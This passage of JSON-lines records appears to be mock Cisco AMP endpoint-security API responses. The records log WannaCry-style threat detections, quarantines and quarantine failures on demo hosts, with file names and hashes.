Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat 